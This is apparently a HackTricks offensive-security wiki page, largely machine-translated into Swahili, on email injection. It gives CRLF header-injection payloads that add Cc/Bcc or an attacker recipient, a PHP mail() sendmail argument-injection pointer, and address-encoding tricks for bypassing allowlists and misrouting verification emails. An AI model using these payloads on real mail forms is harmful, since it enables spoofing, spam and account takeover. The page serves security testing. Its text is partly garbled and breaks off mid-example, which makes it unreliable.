# Email Injections
\
Tumia [**Trickest**](https://trickest.com/?utm\_source=hacktricks\&utm\_medium=text\&utm\_campaign=ppc\&utm\_content=email-injections) kujenga na **kuandaa kazi** kwa urahisi zinazotolewa na zana za jamii **za kisasa zaidi** duniani.\
Pata Ufikiaji Leo:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Jifunze na fanya mazoezi ya GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** π¬ [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
{% endhint %}
## Inject in sent e-mail
### Inject Cc and Bcc after sender argument
```
From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com
```
Ujumbe utatumwa kwa akaunti za mpokeaji na mpokeaji1.
### Ingiza hoja
```
From:sender@domain.com%0ATo:attacker@domain.com
```
Ujumbe utatumwa kwa mpokeaji wa asili na akaunti ya mshambuliaji.
### Ingiza hoja ya kichwa
```
From:sender@domain.com%0ASubject:This is%20Fake%20Subject
```
The fake subject will be added to the original subject and in some cases will replace it. It depends on the mail service behavior.
### Badilisha mwili wa ujumbe
Inject a two-line feed, then write your message to change the body of the message.
```
From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.
```
### PHP mail() function exploitation
```bash
# The function has the following definition:
php --rf mail
Function [ function mail ] {
- Parameters [5] {
Parameter #0 [ $to ]
Parameter #1 [ $subject ]
Parameter #2 [ $message ]
Parameter #3 [ $additional_headers ]
Parameter #4 [ $additional_parameters ]
}
}
```
#### Kigezo cha 5 ($additional\_parameters)
Sehemu hii itategemea **jinsi ya kutumia kigezo hiki ikiwa mshambuliaji anakiendesha**.
Kigezo hiki kitaongezwa kwenye mstari wa amri PHP itakayotumia kuita binary sendmail. Hata hivyo, kitaondolewa kwa kutumia kazi `escapeshellcmd($additional_parameters)`.
Mshambuliaji anaweza **kuchanganya vigezo vya kutolewa kwa sendmail** katika kesi hii.
#### Tofauti katika utekelezaji wa /usr/sbin/sendmail
**sendmail** kiolesura kinatolewa na **programu ya MTA ya barua pepe** (Sendmail, Postfix, Exim n.k.) iliyosakinishwa kwenye mfumo. Ingawa **ufanyaji kazi wa msingi** (kama vile vigezo -t -i -f) unabaki **sawa** kwa sababu za ulinganifu, **kazi na vigezo vingine** vinatofautiana sana kulingana na MTA iliyosakinishwa.
Hapa kuna mifano michache ya kurasa tofauti za mtu wa amri ya sendmail:
* Sendmail MTA: http://www.sendmail.org/\~ca/email/man/sendmail.html
* Postfix MTA: http://www.postfix.org/mailq.1.html
* Exim MTA: https://linux.die.net/man/8/eximReferences
Kulingana na **chanzo cha sendmail** binary, chaguzi tofauti zimegunduliwa kutumia vibaya na **kuvuja faili au hata kutekeleza amri zisizo za kawaida**. Angalia jinsi katika [**https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html**](https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html)
## Changanya katika jina la barua pepe
{% hint style="danger" %}
Kumbuka kwamba ikiwa utaweza kuunda akaunti katika huduma yenye jina la kikoa kisicho na mpangilio (kama Github, Gitlab, CloudFlare Zero trust...) na kuithibitisha kwa kupokea barua pepe ya uthibitisho kwenye anwani yako ya barua, huenda ukawa na uwezo wa kufikia maeneo nyeti ya kampuni ya mwathirika
{% endhint %}
### Sehemu zilizopuuziliwa mbali za barua pepe
Alama: **+, -** na **{}** katika matukio nadra zinaweza kutumika kwa kuweka alama na kupuuziliwa mbali na seva nyingi za barua pepe
* Mfano: john.doe+intigriti@example.com β john.doe@example.com
**Maoni kati ya mabano ()** mwanzoni au mwishoni pia yatapuuziliwa mbali
* Mfano: john.doe(intigriti)@example.com β john.doe@example.com
### Kupita kwenye orodha ya ruhusa
### Nukuu
### IPs
Unaweza pia kutumia IP kama jina la kikoa kati ya mabano ya mraba:
* john.doe@\[127.0.0.1]
* john.doe@\[IPv6:2001:db8::1]
### Uandishi wa Barua Pepe
Kama ilivyoelezwa katika [**tafiti hii**](https://portswigger.net/research/splitting-the-email-atom), majina ya barua pepe yanaweza pia kuwa na wahusika walioandikwa:
* **PHP 256 overflow**: Kazi ya PHP `chr` itaendelea kuongeza 256 kwa wahusika hadi iwe chanya na kisha ifanye operesheni `%256`.
* `String.fromCodePoint(0x10000 + 0x40) // π β @`
{% hint style="success" %}
Lengo la hila hii ni kumaliza na kuchanganya kama `RCPT TO:<"collab@psres.net>collab"@example.com>`\
ambayo itatuma barua pepe ya uthibitisho kwa anwani tofauti ya barua pepe kutoka ile inayotarajiwa (hivyo kuingiza anwani nyingine ya barua pepe ndani ya jina la barua pepe na kuvunja sintaksia wakati wa kutuma barua pepe)
{% endhint %}
Mifumo tofauti ya uandishi:
```bash
# Format
=? utf-8 ? q ? =41=42=43 ?= hi@example.com --> ABChi@example.com
# =? -> Start of encode
# utf-8 -> encoding used
# ? -> separator
# q -> type of encoding
# ? -> separator
# =41=42=43 -> Hex encoded data
# ?= end of encoding
# Other encodings, same example:
#Β iso-8859-1
=?iso-8859-1?q?=61=62=63?=hi@example.com
# utf-8
=?utf-8?q?=61=62=63?=hi@example.com
# utf-7
=?utf-7?q??=hi@example.com
# q encoding + utf-7
=?utf-7?q?&=41?=hi@example.com
# base64
=?utf-8?b?QUJD?=hi@example.com
# bas64 + utf-7
=?utf-7?q??=hi@example.com
#punycode
x@xn--svg/-9x6 β x@
.png)
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
[**HackTricks Training GCP Red Team Expert (GRTE)**.png)
.png)